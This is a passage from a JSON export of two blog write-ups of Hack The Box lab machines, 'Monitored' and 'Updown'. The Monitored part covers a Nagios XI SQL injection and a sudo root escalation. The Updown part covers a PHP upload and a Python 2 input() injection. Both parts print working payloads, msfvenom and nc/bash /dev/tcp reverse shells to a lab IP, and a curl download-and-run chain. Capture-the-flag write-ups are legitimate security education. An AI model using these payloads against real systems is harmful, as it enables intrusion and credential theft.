[{"content":" Machine name: Monitored\nOS: Linux\nIP: 10.10.11.248\nDifficulty: Medium\nUsers: svc : XjH7VCehowpR1xZB\nEnumeration\nnmap TCP\n$ nmap -sC -sV -An -T4 -vvv -p- 10.10.11.248 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0) | ssh-hostkey: | 3072 61e2e7b41b5d46dc3b2f9138e66dc5ff (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABg | 256 2973c5a58daa3f60a94aa3e59f675c93 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBbeArqg4dgxZEFQzd3zpod1RYGUH6Jfz6tcQjHsVTvRNnUzqx5nc7gK2kUUo1HxbEAH+cPziFjNJc6q7vvpzt4= | 256 6d7af9eb8e45c2026ad58d4db3a3376f (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB5o+WJqnyLpmJtLyPL+tEUTFbjMZkx3jUUFqejioAj7 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.56 |_http-title: Did not follow redirect to https://nagios.monitored.htb/ | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.56 (Debian) 389/tcp open ldap syn-ack ttl 63 OpenLDAP 2.2.X - 2.3.X 443/tcp open ssl/http syn-ack ttl 63 Apache httpd 2.4.56 ((Debian)) |_http-title: Nagios XI | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS | ssl-cert: Subject: commonName=nagios.monitored.htb/organizationName=Monitored/stateOrProvinceName=Dorset/countryName=UK/emailAddress=support@monitored.htb/localityName=Bournemouth | Issuer: commonName=nagios.monitored.htb/organizationName=Monitored/stateOrProvinceName=Dorset/countryName=UK/emailAddress=support@monitored.htb/localityName=Bournemouth | Public Key type: rsa10.10.11.248 | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2023-11-11T21:46:55 | Not valid after: 2297-08-25T21:46:55 | MD5: b36a55607a5f047d983864504d67cfe0 | SHA-1: 610938448c36b08b0ae8a132971c8e89cfac2b5b | -----BEGIN CERTIFICATE----- | 
MIID/zCCAuegAwIBAgIUVhOvMcK6dv/Kvzplbf6IxOePX3EwDQYJKoZIhvcNAQEL | 4c8NpU/6egay1sl2ZrQuO8feYA== |_-----END CERTIFICATE----- |_http-server-header: Apache/2.4.56 (Debian) |_ssl-date: TLS randomness does not represent time | tls-alpn: |_ http/1.1 5667/tcp open tcpwrapped syn-ack ttl 63 No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.93%E=4%D=11/10%OT=22%CT=1%CU=37179%PV=Y%DS=2%DC=T%G=Y%TM=691219 OS:%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)\nFoothold\nSNMP\nAn nmap scan of the UDP ports shows that the SNMP port is open. With nmap we run several SNMP scripts and find credentials:\nsvc / \u0026ldquo;XjH7VCehowpR1xZB\u0026rdquo;\n$ nmap -vv --reason -Pn -T4 -sU -sV -p 161 --script=\u0026#34;banner,(snmp* or ssl*) and not (brute or broadcast or dos or external or fuzzer)\u0026#34; -oN \u0026#34;/opt/my-resources/setup/zsh/results/10.10.11.248/scans/udp161/udp_161_snmp-nmap.txt\u0026#34; -oX \u0026#34;/opt/my-resources/setup/zsh/results/10.10.11.248/scans/udp161/xml/udp_161_snmp_nmap.xml\u0026#34; 10.10.11.248 | 631: | Name: sh | Path: /bin/sh | Params: -c sleep 30; sudo -u svc /bin/bash -c /opt/scripts/check_host.sh svc XjH7VCehowpR1xZB\nNagios XI - Cannot login\nThe user/password pair does not work: \u0026ldquo;The specified user account has been disabled or does not exist.\u0026rdquo;\nSQL Injection\nSearching online, we find the following CVE (which we test blind, since we do not know which version of Nagios XI is installed): CVE-2023-40931\nA SQL injection vulnerability in Nagios XI from version 5.11.0 up to and including 5.11.1 allows authenticated attackers to execute arbitrary SQL commands via the ID parameter in the POST request to /nagiosxi/admin/banner_message-ajaxhelper.php\nPOST /nagiosxi/admin/banner_message-ajaxhelper.php HTTP/1.1 Host: 
nagios.monitored.htb Cookie: nagiosxi=lmeogjafdeiommcbnhu1k7s9lh User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:144.0) Gecko/20100101 Firefox/144.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 Priority: u=0, i Te: trailers Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 204\naction=acknowledge_banner_message\u0026amp;token=9f86697945abf56d35a7ee14233bef5b481a51be\u0026amp;id=3+OR+(SELECT+7402+FROM(SELECT+COUNT(*),CONCAT(@@version,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x)a)\n-----------------------\n\u0026lt;p\u0026gt;\u0026lt;pre\u0026gt;SQL Error [nagiosxi] : Duplicate entry \u0026#39;10.5.23-MariaDB-0+deb11u11\u0026#39; for key \u0026#39;group_key\u0026#39;\u0026lt;/pre\u0026gt;\u0026lt;/p\u0026gt; {\u0026#34;message\u0026#34;:\u0026#34;Failed to acknowledge message.\u0026#34;,\u0026#34;msg_type\u0026#34;:\u0026#34;error\u0026#34;}\nWe retrieve the admin hash, which we do not manage to crack.\naction=acknowledge_banner_message\u0026amp;token=9f86697945abf56d35a7ee14233bef5b481a51be\u0026amp;id=3+OR+(SELECT+7402+FROM(SELECT+COUNT(*),CONCAT((select+username+from+xi_users+LIMIT+1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x)a)\n\u0026gt;\u0026gt;\u0026gt; SQL Error [nagiosxi] : Duplicate entry \u0026#39;nagiosadmin1\u0026#39; for key \u0026#39;group_key\u0026#39; # --\u0026gt; nagiosadmin (the trailing \u0026#34;1\u0026#34; is appended by FLOOR(...))\naction=acknowledge_banner_message\u0026amp;token=9f86697945abf56d35a7ee14233bef5b481a51be\u0026amp;id=3+OR+(SELECT+7402+FROM(SELECT+COUNT(*),CONCAT((select+password+from+xi_users+LIMIT+1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x)a)\n\u0026gt;\u0026gt;\u0026gt; SQL Error 
[nagiosxi] : Duplicate entry \u0026#39;$2a$10$825c1eec29c150b118fe7unSfxq80cf7tHwC0J0BG2qZiNzWRUx2C1\u0026#39; for key \u0026#39;group_key\u0026#39;\nI tried to brute-force the hash but it did not work: I had forgotten that every SQL query result gets a \u0026ldquo;1\u0026rdquo; appended at the end\u0026hellip; So my hash was actually:\n$2a$10$825c1eec29c150b118fe7unSfxq80cf7tHwC0J0BG2qZiNzWRUx2C \u0026lt;\u0026mdash;- without the 1 !! (But it did not work anyway)\nxi_users table:\nuser_id, username, password, name, email, backend_ticket, enabled, api_key, api_enabled, login_attempts, last_attempt, last_password_change, last_login, last_edited, \u0026hellip;\nI retrieved the columns of the xi_users table using this kind of query:\nselect COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where table_name=\u0026#39;xi_users\u0026#39; limit 1\nselect COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where table_name=\u0026#39;xi_users\u0026#39; limit 1,1\nselect COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where table_name=\u0026#39;xi_users\u0026#39; limit 2,1\nselect COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where table_name=\u0026#39;xi_users\u0026#39; limit 3,1\n... 
We manage to retrieve the administrator\u0026rsquo;s API key:\n# If you have \u0026#34;...\u0026#34; because your string is very long\nselect api_key from xi_users limit 1\n\u0026gt;\u0026gt;\u0026gt; \u0026#39;IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9C...\u0026#39;\n# You can use SUBSTRING multiple times to dump the string\nselect SUBSTRING(api_key, 1, 10) from xi_users limit 1\nIudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL\nReusing the API requests from another (recent) publicly available exploit, I was able to create a new administrator user:\nPOST /nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL\u0026amp;pretty=1 HTTP/1.1 Host: 10.10.11.248 username=Lu6Wk\u0026amp;password=DxMkC\u0026amp;name=Lu6Wk\u0026amp;email=Lu6Wk%40mail.com\u0026amp;auth_level=admin\nWe can then log in to the Nagios XI web interface with this new user and create commands on this page:\nGET /nagiosxi/includes/components/ccm/index.php?cmd=view\u0026amp;type=command\u0026amp;page=1 ------------------------ https://nagios.monitored.htb/nagiosxi/includes/components/ccm/index.php?cmd=modify\u0026amp;type=command\u0026amp;id=158\u0026amp;page=1\u0026amp;returnUrl=index.php%3Fcmd%3Dview%26type%3Dcommand%26page%3D1 \u0026gt;\u0026gt;\u0026gt; Command Line : cat user.txt ------------------------ GET /nagiosxi/includes/components/nagioscorecfg/applyconfig.php ------------------ GET /nagiosxi/includes/components/ccm/command_test.php?cmd=test\u0026amp;mode=test\u0026amp;cid=158\u0026amp;nsp=443df18d3ff18d83e02a7bb13fc42870f7b73046851cecd9e301897d427f8a5e HTTP/1.1 Host: nagios.monitored.htb User-Agent: python-requests/2.32.4 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive Cookie: nagiosxi=8pi6o9q2kph72ugu230v9vjq2g 
\u0026gt;\u0026gt;\u0026gt;\u0026gt;\u0026gt;\u0026gt;\u0026gt;\u0026gt;\u0026gt;\u0026gt;\u0026gt;\u0026gt;\u0026gt;\u0026gt; HTTP/1.1 200 OK ... [nagios@monitored ~]$ cat user.txt 213b4331f50e5f1072d301938db28331\nStable Shell\n# Reverse Shell Linux ELF $ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.14 LPORT=1337 -f elf \u0026gt; shell [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 74 bytes Final size of elf file: 194 bytes $ http-server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.11.248 - - [11/Nov/2025 19:58:51] \u0026#34;GET /shell HTTP/1.1\u0026#34; 200 - ------------------------------ Through Burp, I executed 3 commands in a row : - curl http://10.10.14.14/shell -O shell - chmod 777 shell - ./shell ------------------------------ $ nc -lnvp 1337 Ncat: Version 7.93 ( https://nmap.org/ncat ) Ncat: Listening on :::1337 Ncat: Listening on 0.0.0.0:1337 Ncat: Connection from 10.10.11.248. Ncat: Connection from 10.10.11.248:53330. python3 -c \u0026#39;import pty;pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; nagios@monitored:/home/nagios$ export TERM=xterm export TERM=xterm nagios@monitored:/home/nagios$ ^Z [1] + 68520 suspended nc -lnvp 1337 $ stty raw -echo;fg [1] + 68520 continued nc -lnvp 1337 nagios@monitored:/home/nagios$ whoami nagios nagios@monitored:/home/nagios$ ls cookie.txt shell user.txt nagios@monitored:/home/nagios$ cat user.txt 213b4331f50e5f1072d301938db28331\nSSH to nagios\nnagios@monitored:/home/nagios$ cd .ssh nagios@monitored:/home/nagios/.ssh$ ssh-keygen -t rsa Generating public/private rsa key pair. 
Enter file in which to save the key (/home/nagios/.ssh/id_rsa): Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in /home/nagios/.ssh/id_rsa Your public key has been saved in /home/nagios/.ssh/id_rsa.pub The key fingerprint is: SHA256:2NBZpIJ+HjRmFS93s8DRbV8sAp4rqh+3kPsTvXVzki0 nagios@monitored The key\u0026#39;s randomart image is: +---[RSA 3072]----+ ...... +----[SHA256]-----+ nagios@monitored:/home/nagios/.ssh$ cat id_rsa.pub ssh-rsa AAAAB3NzaC....id8HqID90SBHsANCYUhofRFH5rCG3alGvYyYNMu+Wk= nagios@monitored nagios@monitored:/home/nagios/.ssh$ mv id_rsa.pub authorized_keys nagios@monitored:/home/nagios/.ssh$ ls authorized_keys id_rsa nagios@monitored:/home/nagios/.ssh$ cat id_rsa -----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAABG5v.......c0Btb25pdG9yZWQBAg== -----END OPENSSH PRIVATE KEY----- -------------------- # Copy the id_rsa to my machine and connect to nagios using SSH $ vim nagios.key $ chmod 600 nagios.key $ ssh nagios@10.10.11.248 -i nagios.key Linux monitored 5.10.0-28-amd64 #1 SMP Debian 5.10.209-2 (2024-01-31) x86_64 ... Last login: Wed Mar 27 10:32:47 2024 from 10.10.14.23 nagios@monitored:~$ whoami nagios nagios@monitored:~$ cat user.txt 213b....8331\nPrivilege Escalation\nCVE-2024-24402\nI run a Google search:\n\u0026ldquo;exploit nagiosxi script as root\u0026rdquo; which leads me to this link: https://gist.github.com/sec-fortress/6d128a5e290e873be4c2ca27b6579eca or alternatively the search:\n\u0026ldquo;cve nagioxi priv esc\u0026rdquo; which leads me to this link, describing the same CVE: https://github.com/MAWK0235/CVE-2024-24402\nRunning sudo -l, we notice that we can execute many binaries as root through sudo. 
Looking more closely at the scripts, they are just stock Nagios XI scripts that have not been modified.\nThis means that if there is a way to exploit these binaries, there is probably a CVE for it online. And if there is not, they are most likely not exploitable.\nnagios@monitored:~$ sudo -l Matching Defaults entries for nagios on localhost: env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin User nagios may run the following commands on localhost:\n(root) NOPASSWD: /etc/init.d/nagios start\n(root) NOPASSWD: /etc/init.d/nagios stop\n(root) NOPASSWD: /etc/init.d/nagios restart\n(root) NOPASSWD: /etc/init.d/nagios reload\n(root) NOPASSWD: /etc/init.d/nagios status\n(root) NOPASSWD: /etc/init.d/nagios checkconfig\n(root) NOPASSWD: /etc/init.d/npcd start\n(root) NOPASSWD: /etc/init.d/npcd stop\n(root) NOPASSWD: /etc/init.d/npcd restart\n(root) NOPASSWD: /etc/init.d/npcd reload\n(root) NOPASSWD: /etc/init.d/npcd status\n(root) NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php *\n(root) NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/send_to_nls.php *\n(root) NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/migrate/migrate.php *\n(root) NOPASSWD: /usr/local/nagiosxi/scripts/components/getprofile.sh\n(root) NOPASSWD: /usr/local/nagiosxi/scripts/upgrade_to_latest.sh\n(root) NOPASSWD: /usr/local/nagiosxi/scripts/change_timezone.sh\n(root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_services.sh *\n(root) NOPASSWD: /usr/local/nagiosxi/scripts/reset_config_perms.sh\n(root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_ssl_config.sh *\n(root) NOPASSWD: /usr/local/nagiosxi/scripts/backup_xi.sh *\nHere is the content of the executable file that lets us abuse /usr/local/nagiosxi/scripts/manage_services.sh to become root
:\nexploit.sh\n#!/bin/bash\n# Create npcd script\necho \u0026#34;#!/bin/bash\u0026#34; \u0026gt; /tmp/npcd\necho \u0026#34;nc -e /bin/bash 10.10.14.14 4445\u0026#34; \u0026gt;\u0026gt; /tmp/npcd\n# Grant executable permissions on the npcd script\nchmod +x /tmp/npcd 2\u0026gt;/dev/null\n# Stop the npcd service\nsudo /usr/local/nagiosxi/scripts/manage_services.sh stop npcd\n# Replace original npcd script\ncp /tmp/npcd /usr/local/nagios/bin/npcd 2\u0026gt;/dev/null\necho \u0026#34;[+] Start Up your listener\u0026#34;\nsleep 1\necho \u0026#34;[+] nc -lvnp 4445\u0026#34;\nsleep 15\necho \u0026#34;[+] Expect your shellzz xD\u0026#34;\n# start service to receive reverse shell\nsudo /usr/local/nagiosxi/scripts/manage_services.sh start npcd\nsleep 5\necho \u0026#34;[+] done\u0026#34;\nSo the idea is to replace the npcd binary with a fake one containing a reverse shell, then restart the service through the manage_services.sh script with sudo.\nnagios@monitored:~$ ./exploit.sh [+] Start Up your listener [+] nc -lvnp 4445 [+] Expect your shellzz xD [+] done ------------------------- nc -lnvp 4445 Ncat: Version 7.93 ( https://nmap.org/ncat ) Ncat: Listening on :::4445 Ncat: Listening on 0.0.0.0:4445 Ncat: Connection from 10.10.11.248. Ncat: Connection from 10.10.11.248:40642. 
whoami root cd /root cat root.txt cf92....0a0a ","date":"2025-11-12T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/monitored-htb/","title":"HTB | Monitored"},{"content":" Machine name: Updown\nOS: Linux\nIP: 10.10.11.177\nDifficulty: Medium\nEnumeration\nnmap\n$ nmap -sC -sV -An -T4 -vvv -p- 10.10.11.177 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 9e1f98d7c8ba61dbf149669d701702e7 (RSA) | ssh-rsa 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 | 256 c21cfe1152e3d7e5f759186b68453f62 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKMJ3/md06ho+1RKACqh2T8urLkt1ST6yJ9EXEkuJh0UI/zFcIffzUOeiD2ZHphWyvRDIqm7ikVvNFmigSBUpXI= | 256 5f6e12670a66e8e2b761bec4143ad38e (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIL1VZrZbtNuK2LKeBBzfz0gywG4oYxgPl+s5QENjani1 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu)) |_http-title: Is my Website up ? 
| http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.41 (Ubuntu)\nFoothold\nsiteisup.htb - Port 80\nSubdomain dev.siteisup.htb\nWe find a subdomain, but no page seems to be reachable (\u0026ldquo;forbidden\u0026rdquo;).\ngobuster vhost -u \u0026#34;siteisup.htb\u0026#34; -w `fzf-wordlists` --append-domain =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) \u0026amp; Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://siteisup.htb [+] Method: GET [+] Threads: 10 [+] Wordlist: /opt/lists/seclists/Discovery/DNS/subdomains-top1million-110000.txt [+] User Agent: gobuster/3.6 [+] Timeout: 10s [+] Append Domain: true =============================================================== Starting gobuster in VHOST enumeration mode =============================================================== Found: dev.siteisup.htb Status: 403 [Size: 281]\ndev/.git - git-dumper\nWe find a dev/.git directory:\ndirsearch -u http://siteisup.htb/dev _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289 Target: http://siteisup.htb/ [00:47:20] Scanning: dev/ [00:47:22] 301 - 315B - /dev/.git -\u0026gt; http://siteisup.htb/dev/.git/ [00:47:22] 200 - 3KB - /dev/.git/ [00:47:22] 200 - 772B - /dev/.git/branches/ [00:47:22] 200 - 298B - /dev/.git/config [00:47:22] 200 - 73B - /dev/.git/description ...\nIn the .git we find a .htaccess file telling us that a specific header unlocks access to certain pages.\n$ git-dumper http://siteisup.htb/dev/ ./git-dump ... 
$ cd git-dump $ cat .htaccess\nSetEnvIfNoCase Special-Dev \u0026#34;only4dev\u0026#34; Required-Header\nOrder Deny,Allow\nDeny from All\nAllow from env=Required-Header\nAccessing dev.siteisup.htb with this header added, we get access to the vhost!\nchecker.php\nWe find a changelog.txt file indicating that an option allowing us to upload files exists. changelog.txt\ncat changelog.txt Beta version 1- Check a bunch of websites. -- ToDo: 1- Multithreading for a faster version :D. 2- Remove the upload option. 3- New admin panel.\nAnalysing the page served on dev.siteisup.htb and the checker.php file recovered from the .git, we understand that it is indeed the same page.\nThis page seems to contain a File Upload vulnerability, which could allow us to execute PHP code.\nFile Upload - PHP RCE\nThe following request uploads a PHP file with the .phar extension, which is executed as PHP:\nPOST / HTTP/1.1 Host: dev.siteisup.htb Special-Dev: only4dev User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:144.0) Gecko/20100101 Firefox/144.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br Content-Type: multipart/form-data; boundary=----geckoformboundary5c49bfd8a8fdd6fcf6070b52067a09e8 Content-Length: 652 Origin: http://dev.siteisup.htb Connection: keep-alive Referer: http://dev.siteisup.htb Upgrade-Insecure-Requests: 1 Priority: u=0, i ------geckoformboundary5c49bfd8a8fdd6fcf6070b52067a09e8 Content-Disposition: form-data; name=\u0026#34;file\u0026#34;; filename=\u0026#34;shell.phar\u0026#34; Content-Type: application/x-php http://google.com http://siteisup.com 
http://10.10.10.10 http://google.com http://google.com http://siteisup.com http://10.10.10.10 http://google.com http://google.com http://siteisup.com http://10.10.10.10 http://google.com \u0026lt;?php echo file_get_contents( \u0026#34;/etc/passwd\u0026#34; ); ?\u0026gt; ------geckoformboundary5c49bfd8a8fdd6fcf6070b52067a09e8 Content-Disposition: form-data; name=\u0026#34;check\u0026#34; Check ------geckoformboundary5c49bfd8a8fdd6fcf6070b52067a09e8--\nThe source code of checker.php recovered from the .git shows us that uploaded files are stored in a directory named:\nmd5(time())\nSo we wrote the following bash script to quickly locate the shell.phar file: md5.sh\n#!/bin/bash\ntimestamp=$(date +%s)\nfor i in {1..10}; do\n    t=$(($timestamp-$i))\n    md5=$(echo -n $t | md5sum | cut -d\u0026#39; \u0026#39; -f1)\n    #echo $md5\n    url=\u0026#39;http://dev.siteisup.htb/uploads/\u0026#39;$md5\u0026#39;/\u0026#39;$1\n    echo \u0026#34;curl \u0026#34;$url\u0026#34; -H \u0026#39;Special-Dev: only4dev\u0026#39; -i\u0026#34;\n    curl $url -H \u0026#39;Special-Dev: only4dev\u0026#39; -i\ndone\nThis Bash script generates the 10 possible directory names for the last 10 elapsed seconds, then sends a curl request to the shell.phar file in each of these 10 directories.\nOnce the Burp request is sent, we just run our Bash script, which finds our shell.phar file and triggers the PHP code it contains. WARNING: in the Burp request, you must add many lines of:\nhttp://google.com http://google.com \u0026hellip;\nat the start of the request body.\nThe reason is that the shell.phar file only exists while checker.php is checking the URLs. 
The more URLs we add, the longer the check runs, and the longer our file survives before being deleted.\nFirst, we displayed /etc/passwd:\n./md5.sh shell.phar\nroot:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:106::/nonexistent:/usr/sbin/nologin syslog:x:104:110::/home/syslog:/usr/sbin/nologin _apt:x:105:65534::/nonexistent:/usr/sbin/nologin tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin sshd:x:109:65534::/run/sshd:/usr/sbin/nologin landscape:x:110:115::/var/lib/landscape:/usr/sbin/nologin pollinate:x:111:1::/var/cache/pollinate:/bin/false systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false 
developer:x:1002:1002::/home/developer:/bin/bash\nReverse Shell - proc_open\nLooking at the output of phpinfo(), we discover that a list of functions is disabled:\nsystem, shell_exec, exec\u0026hellip; The functions usually used to execute commands and obtain a reverse shell do not work.\nHowever, after some research we find the proc_open function, which is not disabled and allows command execution:\n\u0026lt;?php\n$descriptorspec = array(\n    0 =\u0026gt; array(\u0026#34;pipe\u0026#34;, \u0026#34;r\u0026#34;),\n    1 =\u0026gt; array(\u0026#34;pipe\u0026#34;, \u0026#34;w\u0026#34;),\n    2 =\u0026gt; array(\u0026#34;pipe\u0026#34;, \u0026#34;w\u0026#34;)\n);\n$cmd = \u0026#34;bash -c \u0026#39;bash -i \u0026gt;\u0026amp; /dev/tcp/10.10.14.14/4444 0\u0026gt;\u0026amp;1\u0026#39;\u0026#34;;\n$process = proc_open($cmd, $descriptorspec, $pipes);\nif (is_resource($process)) {\n    fclose($pipes[0]);\n    echo stream_get_contents($pipes[1]);\n    fclose($pipes[1]);\n    echo stream_get_contents($pipes[2]);\n    fclose($pipes[2]);\n    proc_close($process);\n}\n?\u0026gt;\nThe better approach would have been to generate a PHP reverse shell directly with msfvenom. That PHP code tries, one by one, every function that allows executing system commands:\nmsfvenom -p php/reverse_php LHOST=10.10.14.14 LPORT=1337 -f raw \u0026gt; shell.php\nUsing this code, we directly obtain a reverse shell through proc_open. The downside of this method is that we do not necessarily know which function produced the reverse shell.\n$ nc -lnvp 1337 Ncat: Version 7.93 ( https://nmap.org/ncat ) Ncat: Listening on :::1337 Ncat: Listening on 0.0.0.0:1337 Ncat: Connection from 10.10.11.177. Ncat: Connection from 10.10.11.177:49708. 
socket_create whoami www-data rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2\u0026gt;\u0026amp;1|nc 10.10.14.14 1338 \u0026gt;/tmp/f ------------------- # Better shell $ nc -lnvp 1338 Ncat: Version 7.93 ( https://nmap.org/ncat ) Ncat: Listening on :::1338 Ncat: Listening on 0.0.0.0:1338 Ncat: Connection from 10.10.11.177. Ncat: Connection from 10.10.11.177:35496. sh: 0: can\u0026#39;t access tty; job control turned off $ whoami www-data $ python -c \u0026#39;import pty;pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; www-data@updown:/var/www/dev/uploads/ab47bcda3749f056619b17b959cdd659$ export TERM=xterm \u0026lt;ab47bcda3749f056619b17b959cdd659$ export TERM=xterm www-data@updown:/var/www/dev/uploads/ab47bcda3749f056619b17b959cdd659$ ^Z [1] + 13292 suspended nc -lnvp 1338 [exegol-pentest] downloads # stty raw -echo;fg [1] + 13292 continued nc -lnvp 1338 www-data@updown:/var/www/dev/uploads/ab47bcda3749f056619b17b959cdd659$\nwww-data -\u0026gt; developer\nSUID binary - Python Injection\nWe find a siteisup binary. Running it, we notice that it directly interprets the code of \u0026ldquo;siteisup_test.py\u0026rdquo;.\nwww-data@updown:/home/developer$ ls dev user.txt www-data@updown:/home/developer$ cd dev www-data@updown:/home/developer/dev$ ls -lah total 32K drwxr-x--- 2 developer www-data 4.0K Jun 22 2022 . drwxr-xr-x 6 developer developer 4.0K Aug 30 2022 .. -rwsr-x--- 1 developer www-data 17K Jun 22 2022 siteisup -rwxr-x--- 1 developer www-data 154 Jun 22 2022 siteisup_test.py\nIn this Python code we see the use of the \u0026ldquo;input\u0026rdquo; function. Moreover, the code is run with Python 2, not Python 3. In Python 2, \u0026ldquo;input\u0026rdquo; does not treat what it reads as a string by default; it evaluates it as an expression. 
We can therefore inject Python code to open a reverse shell. In Python 3, the value returned by input(\u0026quot;\u0026quot;) is a str by default, so no injection is possible:\nPayload:\n__import__(\u0026lsquo;os\u0026rsquo;).system(\u0026lsquo;rm /tmp/b;mkfifo /tmp/b;cat /tmp/b|bash -i 2\u0026gt;\u0026amp;1|nc 10.10.14.14 8888 \u0026gt;/tmp/b\u0026rsquo;)\nimport requests\nurl = input(\u0026#34;Enter URL here:\u0026#34;)\npage = requests.get(url)\nif page.status_code == 200:\n    print \u0026#34;Website is up\u0026#34;\nelse:\n    print \u0026#34;Website is down\u0026#34;\n-------------------------\nwww-data@updown:/home/developer/dev$ ./siteisup Welcome to \u0026#39;siteisup.htb\u0026#39; application Enter URL here:__import__(\u0026#39;os\u0026#39;).system(\u0026#39;rm /tmp/b;mkfifo /tmp/b;cat /tmp/b|bash -i 2\u0026gt;\u0026amp;1|nc 10.10.14.14 8888 \u0026gt;/tmp/b\u0026#39;) rm: cannot remove \u0026#39;/tmp/b\u0026#39;: No such file or directory\nWe get a new reverse shell as \u0026lsquo;developer\u0026rsquo;\n$ nc -lnvp 8888 Ncat: Version 7.93 ( https://nmap.org/ncat ) Ncat: Listening on :::8888 Ncat: Listening on 0.0.0.0:8888 Ncat: Connection from 10.10.11.177. Ncat: Connection from 